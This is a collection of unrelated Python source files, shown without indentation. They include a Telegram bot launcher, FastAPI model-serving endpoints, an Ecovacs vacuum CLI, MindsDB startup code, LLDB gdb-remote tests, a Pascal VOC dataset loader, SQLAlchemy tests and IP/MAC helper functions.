| id | content |
|---|---|
11481120
|
from os import environ
def singleton(cls, *args, **kw):
instances = {}
def _singleton():
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class Configuration(object):
KEY_API_URL = "API_API_URL"
KEY_DATACOLLECTOR_URL = "DATACOLLECTOR_API_URL"
def get_value(self, key):
"""Returns configuration value for the given key, or None if value was
not found.
Arguments:
key (str)
Returns:
str
"""
assert key, 'Missing key to retrieve parameter value.'
return environ.get(key)
def get_required_value(self, key):
"""Returns configuration value for the given key, or exception if
value was not found.
Arguments:
key (str)
Returns:
str
"""
value = Configuration().get_value(key)
assert value, 'Required value not found for key [%s].' % key
return value
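# --- Usage sketch (added for illustration; not part of the original module) ---
# The @singleton decorator caches a single Configuration instance, so every
# call to Configuration() returns the same object. Note that the decorator
# replaces the class name with a plain function, so class constants must be
# read from the instance. Assuming a hypothetical environment value:
#
#     environ['API_API_URL'] = 'https://api.example.org'   # hypothetical value
#     config = Configuration()
#     assert config is Configuration()              # same cached instance each call
#     print(config.get_value(config.KEY_API_URL))   # -> the URL set above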
|
11481143
|
from os import environ
from dotenv import load_dotenv
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from bin.handlers import *
if 'TELEGRAM_TOKEN' not in environ:
load_dotenv()
TOKEN = environ.get('TELEGRAM_TOKEN')
def main():
updater = Updater(
TOKEN, workers=32, use_context=True,
request_kwargs={'read_timeout': 60, 'connect_timeout': 60}
)
handlers = [
CommandHandler('start', start_handler, run_async=True),
CommandHandler('help', help_handler, run_async=True),
CommandHandler('changes', changes_handler, run_async=True),
CommandHandler('cookbook', cookbook_handler, run_async=True),
MessageHandler(
Filters.regex('(?i)(^alt:)'),
alt_handler, run_async=True
),
MessageHandler(
Filters.regex('(?i)(^vaporize:)'),
vaporize_handler, run_async=True
),
MessageHandler(Filters.reply, reply_handler, run_async=True),
MessageHandler(Filters.text, main_handler, run_async=True),
MessageHandler(Filters.all, all_handler, run_async=True),
]
dispatcher = updater.dispatcher
dispatcher.add_error_handler(error_handler)
for handler in handlers:
dispatcher.add_handler(handler)
if environ.get('ENVIRONMENT', None) == 'HEROKU':
print('Starting Webhook')
updater.start_webhook(
listen='0.0.0.0',
port=int(environ.get('PORT')),
url_path=TOKEN,
webhook_url="https://dankbot-tg.herokuapp.com/" + TOKEN
)
# updater.bot.setWebhook('https://dankbot-tg.herokuapp.com/' + TOKEN)
updater.idle()
else:
print("Starting Polling")
updater.start_polling()
if __name__ == '__main__':
main()
|
11481182
|
import base64
import io
import uuid
from logging import getLogger
from typing import Any, Dict
import requests
from fastapi import APIRouter, BackgroundTasks
from PIL import Image
from src.app.backend import background_job, store_data_job
from src.app.backend.data import Data
from src.configurations import ModelConfigurations
logger = getLogger(__name__)
router = APIRouter()
@router.get("/health")
def health() -> Dict[str, str]:
return {"health": "ok"}
@router.get("/metadata")
def metadata() -> Dict[str, Any]:
model_spec_name = ModelConfigurations.model_spec_name
address = ModelConfigurations.address
port = ModelConfigurations.rest_port
serving_address = f"http://{address}:{port}/v1/models/{model_spec_name}/versions/0/metadata"
response = requests.get(serving_address)
return response.json()
@router.get("/label")
def label() -> Dict[int, str]:
return ModelConfigurations.labels
@router.get("/predict/test")
def predict_test(background_tasks: BackgroundTasks) -> Dict[str, str]:
job_id = str(uuid.uuid4())[:6]
data = Data()
data.image_data = ModelConfigurations.sample_image
background_job.save_data_job(data.image_data, job_id, background_tasks, True)
return {"job_id": job_id}
@router.post("/predict")
def predict(data: Data, background_tasks: BackgroundTasks) -> Dict[str, str]:
image = base64.b64decode(str(data.image_data))
io_bytes = io.BytesIO(image)
data.image_data = Image.open(io_bytes)
job_id = str(uuid.uuid4())[:6]
background_job.save_data_job(
data=data.image_data,
job_id=job_id,
background_tasks=background_tasks,
enqueue=True,
)
return {"job_id": job_id}
@router.get("/job/{job_id}")
def prediction_result(job_id: str) -> Dict[str, Dict[str, str]]:
result = {job_id: {"prediction": ""}}
data = store_data_job.get_data_redis(job_id)
result[job_id]["prediction"] = data
return result
|
11481198
|
import configparser
import itertools
import os
import platform
import random
import re
import click
from pycountry_convert import country_alpha2_to_continent_code
from sucks import *
class FrequencyParamType(click.ParamType):
name = 'frequency'
RATIONAL_PATTERN = re.compile(r'([.0-9]+)/([.0-9]+)')
def convert(self, value, param, ctx):
result = None
try:
search = self.RATIONAL_PATTERN.search(value)
if search:
result = float(search.group(1)) / float(search.group(2))
else:
try:
result = float(value)
except ValueError:
pass
except (ValueError, ArithmeticError):
pass
if result is None:
self.fail('%s is not a valid frequency' % value, param, ctx)
if 0 <= result <= 1:
return result
self.fail('%s is not between 0 and 1' % value, param, ctx)
FREQUENCY = FrequencyParamType()
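# --- Illustration (added; not part of the original module) ---
# FREQUENCY accepts a plain float or a "numerator/denominator" string and
# rejects anything outside [0, 1], e.g. (param and ctx omitted for brevity):
#
#     FREQUENCY.convert('0.5', None, None)   # -> 0.5
#     FREQUENCY.convert('3/7', None, None)   # -> 0.42857...
#     FREQUENCY.convert('2', None, None)     # fails: "2 is not between 0 and 1"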
class BotWait():
pass
def wait(self, bot):
raise NotImplementedError()
class TimeWait(BotWait):
def __init__(self, seconds):
super().__init__()
self.seconds = seconds
def wait(self, bot):
click.echo("waiting for " + str(self.seconds) + "s")
time.sleep(self.seconds)
class StatusWait(BotWait):
def __init__(self, wait_on, wait_for):
super().__init__()
self.wait_on = wait_on
self.wait_for = wait_for
def wait(self, bot):
if not hasattr(bot, self.wait_on):
raise ValueError("object " + bot + " does not have method " + self.wait_on)
logging.debug("waiting on " + self.wait_on + " for value " + self.wait_for)
while getattr(bot, self.wait_on) != self.wait_for:
time.sleep(0.5)
logging.debug("wait complete; " + self.wait_on + " is now " + self.wait_for)
class CliAction:
def __init__(self, vac_command, terminal=False, wait=None):
self.vac_command = vac_command
self.terminal = terminal
self.wait = wait
def config_file():
if platform.system() == 'Windows':
return os.path.join(os.getenv('APPDATA'), 'sucks.conf')
else:
return os.path.expanduser('~/.config/sucks.conf')
def config_file_exists():
return os.path.isfile(config_file())
def read_config():
parser = configparser.ConfigParser()
with open(config_file()) as fp:
parser.read_file(itertools.chain(['[global]'], fp), source=config_file())
return parser['global']
def write_config(config):
os.makedirs(os.path.dirname(config_file()), exist_ok=True)
with open(config_file(), 'w') as fp:
for key in config:
fp.write(key + '=' + str(config[key]) + "\n")
def current_country():
# noinspection PyBroadException
try:
return requests.get('http://ipinfo.io/json').json()['country'].lower()
except:
return 'us'
def continent_for_country(country_code):
return country_alpha2_to_continent_code(country_code.upper()).lower()
def should_run(frequency):
if frequency is None:
return True
n = random.random()
result = n <= frequency
logging.debug("tossing coin: {:0.3f} <= {:0.3f}: {}".format(n, frequency, result))
return result
@click.group(chain=True)
@click.option('--debug/--no-debug', default=False)
def cli(debug):
level = logging.DEBUG if debug else logging.ERROR
logging.basicConfig(level=level, format='%(levelname)-8s %(message)s')
@cli.command(help='logs in with specified email; run this first')
@click.option('--email', prompt='Ecovacs app email')
@click.option('--password', prompt='Ecovacs app password', hide_input=True)
@click.option('--country-code', prompt='your two-letter country code', default=lambda: current_country())
@click.option('--continent-code', prompt='your two-letter continent code',
default=lambda: continent_for_country(click.get_current_context().params['country_code']))
def login(email, password, country_code, continent_code):
if config_file_exists() and not click.confirm('overwrite existing config?'):
click.echo("Skipping login.")
exit(0)
config = OrderedDict()
password_hash = EcoVacsAPI.md5(password)
device_id = EcoVacsAPI.md5(str(time.time()))
try:
EcoVacsAPI(device_id, email, password_hash, country_code, continent_code)
except ValueError as e:
click.echo(e.args[0])
exit(1)
config['email'] = email
config['password_hash'] = password_hash
config['device_id'] = device_id
config['country'] = country_code.lower()
config['continent'] = continent_code.lower()
write_config(config)
click.echo("Config saved.")
exit(0)
@cli.command(help='auto-cleans for the specified number of minutes')
@click.option('--frequency', '-f', type=FREQUENCY, help='frequency with which to run; e.g. 0.5 or 3/7')
@click.argument('minutes', type=click.FLOAT)
def clean(frequency, minutes):
if should_run(frequency):
return CliAction(Clean(), wait=TimeWait(minutes * 60))
@cli.command(help='cleans room edges for the specified number of minutes')
@click.option('--frequency', '-f', type=FREQUENCY, help='frequency with which to run; e.g. 0.5 or 3/7')
@click.argument('minutes', type=click.FLOAT)
def edge(frequency, minutes):
if should_run(frequency):
return CliAction(Edge(), wait=TimeWait(minutes * 60))
@cli.command(help='returns to charger')
def charge():
return charge_action()
def charge_action():
return CliAction(Charge(), terminal=True, wait=StatusWait('charge_status', 'charging'))
@cli.command(help='stops the robot in its current position')
def stop():
return CliAction(Stop(), terminal=True, wait=StatusWait('clean_status', 'stop'))
@cli.resultcallback()
def run(actions, debug):
actions = list(filter(None.__ne__, actions))
if actions and charge and not actions[-1].terminal:
actions.append(charge_action())
if not config_file_exists():
click.echo("Not logged in. Do 'click login' first.")
exit(1)
if debug:
logging.debug("will run {}".format(actions))
if actions:
config = read_config()
api = EcoVacsAPI(config['device_id'], config['email'], config['password_hash'],
config['country'], config['continent'])
vacuum = api.devices()[0]
vacbot = VacBot(api.uid, api.REALM, api.resource, api.user_access_token, vacuum, config['continent'])
vacbot.connect_and_wait_until_ready()
for action in actions:
click.echo("performing " + str(action.vac_command))
vacbot.run(action.vac_command)
action.wait.wait(vacbot)
vacbot.disconnect(wait=True)
click.echo("done")
if __name__ == '__main__':
cli()
|
11481216
|
import os
import sys
import json
from mindsdb.__about__ import __version__ # noqa: F401
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.utilities.fs import get_or_create_data_dir, create_dirs_recursive
from mindsdb.utilities.functions import args_parse, is_notebook
from mindsdb.utilities.telemetry import telemetry_file_exists, disable_telemetry
is_ray_worker = False
if sys.argv[0].endswith('ray/workers/default_worker.py'):
is_ray_worker = True
is_alembic = os.path.basename(sys.argv[0]).split('.')[0] == 'alembic'
if not is_ray_worker:
try:
if not is_notebook() and not is_alembic:
args = args_parse()
else:
args = None
except Exception:
# This fails in some notebooks. The is_notebook() check above is still needed because,
# even when this exception is caught, trying to read the args still leads to failures
# in other notebook environments.
args = None
# ---- CHECK SYSTEM ----
if not (sys.version_info[0] >= 3 and sys.version_info[1] >= 6):
print("""
MindsDB server requires Python >= 3.6 to run
Once you have Python 3.6 installed you can run mindsdb as follows:
1. create and activate venv:
python3.6 -m venv venv
source venv/bin/activate
2. install MindsDB:
pip3 install mindsdb
3. Run MindsDB
python3.6 -m mindsdb
More instructions in https://docs.mindsdb.com
""")
exit(1)
# --- VERSION MODE ----
if args is not None and args.version:
print(f'MindsDB {mindsdb_version}')
sys.exit(0)
# --- MODULE OR LIBRARY IMPORT MODE ----
if args is not None and args.config is not None:
config_path = args.config
with open(config_path, 'r') as fp:
user_config = json.load(fp)
else:
user_config = {}
config_path = 'absent'
os.environ['MINDSDB_CONFIG_PATH'] = config_path
if 'storage_dir' in user_config:
root_storage_dir = user_config['storage_dir']
os.environ['MINDSDB_STORAGE_DIR'] = root_storage_dir
elif os.environ.get('MINDSDB_STORAGE_DIR') is not None:
root_storage_dir = os.environ['MINDSDB_STORAGE_DIR']
else:
root_storage_dir = get_or_create_data_dir()
os.environ['MINDSDB_STORAGE_DIR'] = root_storage_dir
if os.path.isdir(root_storage_dir) is False:
os.makedirs(root_storage_dir)
if 'storage_db' in user_config:
os.environ['MINDSDB_DB_CON'] = user_config['storage_db']
elif os.environ.get('MINDSDB_DB_CON', '') == '':
os.environ['MINDSDB_DB_CON'] = 'sqlite:///' + os.path.join(os.environ['MINDSDB_STORAGE_DIR'], 'mindsdb.sqlite3.db') + '?check_same_thread=False&timeout=30'
from mindsdb.utilities.config import Config
mindsdb_config = Config()
create_dirs_recursive(mindsdb_config['paths'])
os.environ['DEFAULT_LOG_LEVEL'] = os.environ.get('DEFAULT_LOG_LEVEL', 'ERROR')
os.environ['LIGHTWOOD_LOG_LEVEL'] = os.environ.get('LIGHTWOOD_LOG_LEVEL', 'ERROR')
os.environ['MINDSDB_STORAGE_PATH'] = mindsdb_config['paths']['predictors']
if telemetry_file_exists(mindsdb_config['storage_dir']):
os.environ['CHECK_FOR_UPDATES'] = '0'
print('\n x telemetry disabled! \n')
elif os.getenv('CHECK_FOR_UPDATES', '1').lower() in ['0', 'false'] or mindsdb_config.get('cloud', False):
disable_telemetry(mindsdb_config['storage_dir'])
print('\n x telemetry disabled \n')
else:
print('\n ✓ telemetry enabled \n')
|
11481238
|
from __future__ import print_function
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteThreadsInStopReply(
gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
ENABLE_THREADS_IN_STOP_REPLY_ENTRIES = [
"read packet: $QListThreadsInStopReply#21",
"send packet: $OK#00",
]
def gather_stop_reply_threads(self, post_startup_log_lines, thread_count):
# Set up the inferior args.
inferior_args = []
for i in range(thread_count - 1):
inferior_args.append("thread:new")
inferior_args.append("sleep:10")
procs = self.prep_debug_monitor_and_inferior(
inferior_args=inferior_args)
# Assumes test_sequence has anything added needed to setup the initial state.
# (Like optionally enabling QThreadsInStopReply.)
if post_startup_log_lines:
self.test_sequence.add_log_lines(post_startup_log_lines, True)
self.test_sequence.add_log_lines([
"read packet: $c#63"
], True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Give threads time to start up, then break.
time.sleep(1)
self.reset_test_sequence()
self.test_sequence.add_log_lines(
[
"read packet: {}".format(
chr(3)),
{
"direction": "send",
"regex": r"^\$T([0-9a-fA-F]+)([^#]+)#[0-9a-fA-F]{2}$",
"capture": {
1: "stop_result",
2: "key_vals_text"}},
],
True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Wait until all threads have started.
threads = self.wait_for_thread_count(thread_count, timeout_seconds=3)
self.assertIsNotNone(threads)
self.assertEqual(len(threads), thread_count)
# Run, then stop the process, grab the stop reply content.
self.reset_test_sequence()
self.test_sequence.add_log_lines(["read packet: $c#63",
"read packet: {}".format(chr(3)),
{"direction": "send",
"regex": r"^\$T([0-9a-fA-F]+)([^#]+)#[0-9a-fA-F]{2}$",
"capture": {1: "stop_result",
2: "key_vals_text"}},
],
True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
# Parse the stop reply contents.
key_vals_text = context.get("key_vals_text")
self.assertIsNotNone(key_vals_text)
kv_dict = self.parse_key_val_dict(key_vals_text)
self.assertIsNotNone(kv_dict)
# Pull out threads from stop response.
stop_reply_threads_text = kv_dict.get("threads")
if stop_reply_threads_text:
return [int(thread_id, 16)
for thread_id in stop_reply_threads_text.split(",")]
else:
return []
def QListThreadsInStopReply_supported(self):
procs = self.prep_debug_monitor_and_inferior()
self.test_sequence.add_log_lines(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, True)
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
@debugserver_test
def test_QListThreadsInStopReply_supported_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.QListThreadsInStopReply_supported()
@llgs_test
def test_QListThreadsInStopReply_supported_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.QListThreadsInStopReply_supported()
def stop_reply_reports_multiple_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, thread_count)
self.assertEqual(len(stop_reply_threads), thread_count)
@debugserver_test
def test_stop_reply_reports_multiple_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_multiple_threads(5)
@llgs_test
def test_stop_reply_reports_multiple_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_multiple_threads(5)
def no_QListThreadsInStopReply_supplies_no_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is not
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(None, thread_count)
self.assertEqual(len(stop_reply_threads), 0)
@debugserver_test
def test_no_QListThreadsInStopReply_supplies_no_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.no_QListThreadsInStopReply_supplies_no_threads(5)
@llgs_test
def test_no_QListThreadsInStopReply_supplies_no_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.no_QListThreadsInStopReply_supplies_no_threads(5)
def stop_reply_reports_correct_threads(self, thread_count):
# Gather threads from stop notification when QThreadsInStopReply is
# enabled.
stop_reply_threads = self.gather_stop_reply_threads(
self.ENABLE_THREADS_IN_STOP_REPLY_ENTRIES, thread_count)
self.assertEqual(len(stop_reply_threads), thread_count)
# Gather threads from q{f,s}ThreadInfo.
self.reset_test_sequence()
self.add_threadinfo_collection_packets()
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
threads = self.parse_threadinfo_packets(context)
self.assertIsNotNone(threads)
self.assertEqual(len(threads), thread_count)
# Ensure each thread in q{f,s}ThreadInfo appears in stop reply threads
for tid in threads:
self.assertTrue(tid in stop_reply_threads)
@debugserver_test
def test_stop_reply_reports_correct_threads_debugserver(self):
self.init_debugserver_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_correct_threads(5)
@llgs_test
def test_stop_reply_reports_correct_threads_llgs(self):
self.init_llgs_test()
self.build()
self.set_inferior_startup_launch()
self.stop_reply_reports_correct_threads(5)
|
11481244
|
import configparser
import pymysql
import urllib.request
parser = configparser.ConfigParser()
parser.read("../halite.ini")
DB_CONFIG = parser["database"]
db = pymysql.connect(host=DB_CONFIG["hostname"], user=DB_CONFIG['username'], passwd=DB_CONFIG['password'], db=DB_CONFIG['name'], cursorclass=pymysql.cursors.DictCursor)
cursor = db.cursor()
cursor.execute("select email, userID, organization from User")
users = cursor.fetchall()
orgs = [line.strip().split(" - ") for line in open("../website/organizationWhitelist.txt").readlines()]
for user in users:
if user["email"] == None:
continue
realUserOrg = "Other"
try:
emailDomain = user["email"].split("@")[1]
except IndexError:
continue
for org in orgs:
if emailDomain == org[1]:
realUserOrg = org[0]
break
if (realUserOrg != "Other" or user["organization"] == "") and realUserOrg != user["organization"]:
print("%s, %s, %s" % (realUserOrg, user["organization"], user["email"]))
cursor.execute("update User set organization = '"+realUserOrg+"' where userID="+str(user["userID"]))
db.commit()
|
11481259
|
import argparse
import yaml
import os
from pprint import pprint
from .flitton_fib_rs import run_config
def config_number_command() -> None:
parser = argparse.ArgumentParser(
description='Calculate Fibonacci numbers '
'using a config file')
parser.add_argument('--path', action='store',
type=str, required=True,
help="path to config file")
args = parser.parse_args()
with open(os.path.join(os.getcwd(), args.path)) as f:
config_data: dict = yaml.safe_load(f)
print("Here is the config data: ")
pprint(config_data)
print(f"Here is the result:")
pprint(run_config(config_data))
|
11481313
|
import argparse
import codecs
from markdown import Markdown
import pickle
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", help="Output pickle file path",
default=None)
parser.add_argument("input", help="Input API Blueprint file")
args = parser.parse_args()
with codecs.open(args.input, "r", "utf-8") as fin:
txt = fin.read()
m = Markdown(extensions=["plueprint"])
m.set_output_format("apiblueprint")
api = m.convert(txt)
if args.output is not None:
with open(args.output, "wb") as fout:
pickle.dump(api, fout, protocol=-1)
else:
print(api)
print("Resource groups:")
for g in api:
print(" %s" % g)
print(" Resources:")
for r in g:
print(" %s" % r)
print(" Actions:")
for a in r:
print(" %s" % a)
if __name__ == "__main__":
main()
|
11481350
|
import os
import pickle
import torch
import torch.utils.data
from PIL import Image
import xml.etree.ElementTree as ET
from wetectron.structures.bounding_box import BoxList
from wetectron.structures.boxlist_ops import remove_small_boxes
from .coco import unique_boxes
class PascalVOCDataset(torch.utils.data.Dataset):
CLASSES = (
"__background__ ",
"aeroplane",
"bicycle",
"bird",
"boat",
"bottle",
"bus",
"car",
"cat",
"chair",
"cow",
"diningtable",
"dog",
"horse",
"motorbike",
"person",
"pottedplant",
"sheep",
"sofa",
"train",
"tvmonitor",
)
def __init__(self, data_dir, split, use_difficult=False, transforms=None, proposal_file=None):
self.root = data_dir
self.image_set = split
self.keep_difficult = use_difficult
self.transforms = transforms
self._annopath = os.path.join(self.root, "Annotations", "%s.xml")
self._imgpath = os.path.join(self.root, "JPEGImages", "%s.jpg")
self._imgsetpath = os.path.join(self.root, "ImageSets", "Main", "%s.txt")
with open(self._imgsetpath % self.image_set) as f:
self.ids = f.readlines()
self.ids = [x.strip("\n") for x in self.ids]
self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
cls = PascalVOCDataset.CLASSES
self.class_to_ind = dict(zip(cls, range(len(cls))))
self.categories = dict(zip(range(len(cls)), cls))
# Include proposals from a file
if proposal_file is not None:
print('Loading proposals from: {}'.format(proposal_file))
with open(proposal_file, 'rb') as f:
self.proposals = pickle.load(f, encoding='latin1')
# self.id_field = 'indexes' if 'indexes' in self.proposals else 'ids' # compat fix
# _sort_proposals(self.proposals, self.id_field)
self.top_k = -1
else:
self.proposals = None
def get_origin_id(self, index):
img_id = self.ids[index]
return img_id
def __getitem__(self, index):
img_id = self.ids[index]
img = Image.open(self._imgpath % img_id).convert("RGB")
if not os.path.exists(self._annopath % img_id):
target = None
else:
target = self.get_groundtruth(index)
target = target.clip_to_image(remove_empty=True)
if self.proposals is not None:
if '_' in self.ids[index] and self.image_set == "test" and "2012" in self.root :
img_id = int(self.ids[index].split('_')[1])
else:
img_id = int(self.ids[index])
id_field = 'indexes' if 'indexes' in self.proposals else 'ids' # compat fix
roi_idx = self.proposals[id_field].index(img_id)
rois = self.proposals['boxes'][roi_idx]
# scores = self.proposals['scores'][roi_idx]
# assert rois.shape[0] == scores.shape[0]
# remove duplicate, clip, remove small boxes, and take top k
keep = unique_boxes(rois)
rois = rois[keep, :]
# scores = scores[keep]
rois = BoxList(torch.tensor(rois), img.size, mode="xyxy")
rois = rois.clip_to_image(remove_empty=True)
# TODO: deal with scores
rois = remove_small_boxes(boxlist=rois, min_size=2)
if self.top_k > 0:
rois = rois[[range(self.top_k)]]
# scores = scores[:self.top_k]
else:
rois = None
if self.transforms is not None:
img, target, rois = self.transforms(img, target, rois)
return img, target, rois, index
def __len__(self):
return len(self.ids)
def get_groundtruth(self, index):
img_id = self.ids[index]
anno = ET.parse(self._annopath % img_id).getroot()
anno = self._preprocess_annotation(anno)
height, width = anno["im_info"]
target = BoxList(anno["boxes"], (width, height), mode="xyxy")
target.add_field("labels", anno["labels"])
target.add_field("difficult", anno["difficult"])
return target
def _preprocess_annotation(self, target):
boxes = []
gt_classes = []
difficult_boxes = []
TO_REMOVE = 1
for obj in target.iter("object"):
difficult = int(obj.find("difficult").text) == 1
if not self.keep_difficult and difficult:
continue
name = obj.find("name").text.lower().strip()
bb = obj.find("bndbox")
# Make pixel indexes 0-based
# Refer to "https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211"
box = [
bb.find("xmin").text,
bb.find("ymin").text,
bb.find("xmax").text,
bb.find("ymax").text,
]
bndbox = tuple(
map(lambda x: x - TO_REMOVE, list(map(int, box)))
)
boxes.append(bndbox)
gt_classes.append(self.class_to_ind[name])
difficult_boxes.append(difficult)
size = target.find("size")
im_info = tuple(map(int, (size.find("height").text, size.find("width").text)))
res = {
"boxes": torch.tensor(boxes, dtype=torch.float32),
"labels": torch.tensor(gt_classes),
"difficult": torch.tensor(difficult_boxes),
"im_info": im_info,
}
return res
def get_img_info(self, index):
img_id = self.ids[index]
file_name = "JPEGImages/%s.jpg" % img_id
if os.path.exists(self._annopath % img_id):
anno = ET.parse(self._annopath % img_id).getroot()
size = anno.find("size")
im_info = tuple(map(int, (size.find("height").text, size.find("width").text)))
return {"height": im_info[0], "width": im_info[1], "file_name": file_name}
else:
name = os.path.join(self.root, file_name)
img = Image.open(name).convert("RGB")
return {"height": img.size[1], "width": img.size[0], "file_name": file_name}
def map_class_id_to_class_name(self, class_id):
return PascalVOCDataset.CLASSES[class_id]
|
11481387
|
import pytest
import sqlalchemy as sa
from sqlalchemy_utils import aggregated
@pytest.fixture
def Catalog(Base):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column(sa.Integer, primary_key=True)
@aggregated(
'categories.sub_categories.products',
sa.Column(sa.Integer, default=0)
)
def product_count(self):
return sa.func.count('1')
categories = sa.orm.relationship('Category', backref='catalog')
return Catalog
@pytest.fixture
def Category(Base):
class Category(Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
catalog_id = sa.Column(sa.Integer, sa.ForeignKey('catalog.id'))
sub_categories = sa.orm.relationship(
'SubCategory', backref='category'
)
return Category
@pytest.fixture
def SubCategory(Base):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column(sa.Integer, primary_key=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey('category.id'))
products = sa.orm.relationship('Product', backref='sub_category')
return SubCategory
@pytest.fixture
def Product(Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column(sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
sub_category_id = sa.Column(
sa.Integer, sa.ForeignKey('sub_category.id')
)
return Product
@pytest.fixture
def init_models(Catalog, Category, SubCategory, Product):
pass
@pytest.fixture
def catalog_factory(Product, SubCategory, Category, Catalog, session):
def catalog_factory():
product = Product()
sub_category = SubCategory(
products=[product]
)
category = Category(sub_categories=[sub_category])
catalog = Catalog(categories=[category])
session.add(catalog)
return catalog
return catalog_factory
@pytest.mark.usefixtures('postgresql_dsn')
class Test3LevelDeepOneToMany(object):
def test_assigns_aggregates(self, session, catalog_factory):
catalog = catalog_factory()
session.commit()
session.refresh(catalog)
assert catalog.product_count == 1
def catalog_factory(
self,
session,
Product,
SubCategory,
Category,
Catalog
):
product = Product()
sub_category = SubCategory(
products=[product]
)
category = Category(sub_categories=[sub_category])
catalog = Catalog(categories=[category])
session.add(catalog)
return catalog
def test_only_updates_affected_aggregates(
self,
session,
catalog_factory,
Product
):
catalog = catalog_factory()
catalog2 = catalog_factory()
session.commit()
# force set catalog2 product_count to zero in order to check if it gets
# updated when the other catalog's product count gets updated
session.execute(
'UPDATE catalog SET product_count = 0 WHERE id = %d'
% catalog2.id
)
catalog.categories[0].sub_categories[0].products.append(
Product()
)
session.commit()
session.refresh(catalog)
session.refresh(catalog2)
assert catalog.product_count == 2
assert catalog2.product_count == 0
|
11481407
|
from struct import pack, unpack
from socket import inet_aton, inet_ntoa
def dec2dot(dec):
'''
convert ip address from decimal format to dotted-quad format
'''
if dec>0xFFFFFFFF:
dec = 0xFFFFFFFF
ip = pack('!L', dec)
return inet_ntoa(ip)
def dot2dec(dot):
'''
convert ip address from dotted-quad format to decimal format
'''
ip = inet_aton(dot)
return unpack('!L', ip)[0]
def mac2byte(addr):
'''
Convert MAC address to byte
'''
mac = []
byte = ''
if ':' in addr:
mac = addr.split(':')
elif '-' in addr:
mac = addr.split('-')
else:
raise ValueError('error: MAC address not valid')
for m in mac:
byte += chr(int(m, 16))
return byte
def byte2mac(addr):
'''
Convert byte mac address to XX:XX:XX:XX:XX:XX
'''
mac = ''
for b in addr:
byte = hex(ord(b)) # '0xXX', '0xX'
byte = byte.replace('x', '')
if len(byte)>2:
mac += byte[1:] + ':'
else:
mac += byte + ':'
return mac.strip(':')
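# --- Usage sketch (added for illustration; not part of the original module) ---
if __name__ == '__main__':
    assert dec2dot(3232235777) == '192.168.1.1'
    assert dot2dec('192.168.1.1') == 3232235777
    # mac2byte/byte2mac round-trip
    assert byte2mac(mac2byte('aa:bb:cc:dd:ee:ff')) == 'aa:bb:cc:dd:ee:ff'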
|
11481410
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms, models
from torchvision.transforms.functional import resize, pad
from .identifier import ImageCharacterIdentifierBBox
from ..module import ImageBBEncoder, Similarity
from ..util import download
from .res18_single import Identity, Normalize, Res18Normalized
class PadResize(object):
def __init__(self, size, fill=0, padding_mode="constant", interpolation=2):
self.fill = fill
self.padding_mode = padding_mode
self.size = size
self.interpolation = interpolation
def __call__(self, img):
width, height = img.size
max_size = max(width, height)
left, right, top, bottom = 0, 0, 0, 0
if width > height:
top = bottom = (width - height) // 2
if (width - height) % 2 == 1:
top += 1
elif height > width:
left = right = (height - width) // 2
if (height - width) % 2 == 1:
left += 1
img = pad(img, (left, top, right, bottom), fill=self.fill,
padding_mode=self.padding_mode)
img = resize(img, size=self.size, interpolation=self.interpolation)
return img
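# --- Illustration (added; not part of the original module) ---
# PadResize first pads the shorter side so the image becomes square, then
# resizes the square image to the target size, e.g.:
#
#     from PIL import Image
#     im = Image.new('RGB', (100, 60))   # wider than tall
#     out = PadResize(224)(im)           # padded to 100x100, then resized to 224x224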
class Res18_CharacterIdentifier_BBox(ImageCharacterIdentifierBBox):
def __init__(self, base_dir=None):
model_fn = download(
"https://github.com/kosuke1701/character-reid/releases/download/0.0/0716_bbox.mdl",
"0716_bbox.mdl"
)
saved_models = torch.load(model_fn, map_location="cpu")
state_dict = {key.replace("trunk", "model.0"): val
for key, val in saved_models["trunk"].items()}
state_dict.update(saved_models["trunk"])
state_dict["embedder.1.weight"] = saved_models["embedder"]["module.0.weight"]
state_dict["embedder.1.bias"] = saved_models["embedder"]["module.0.bias"]
state_dict["model.1.1.weight"] = saved_models["embedder"]["module.0.weight"]
state_dict["model.1.1.bias"] = saved_models["embedder"]["module.0.bias"]
model = Res18Normalized(0.0, 500)
model.load_state_dict(state_dict)
transform = [
PadResize(224),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
]
transform = transforms.Compose(transform)
encoder = ImageBBEncoder(model, post_trans=transform,
scale=1.5)
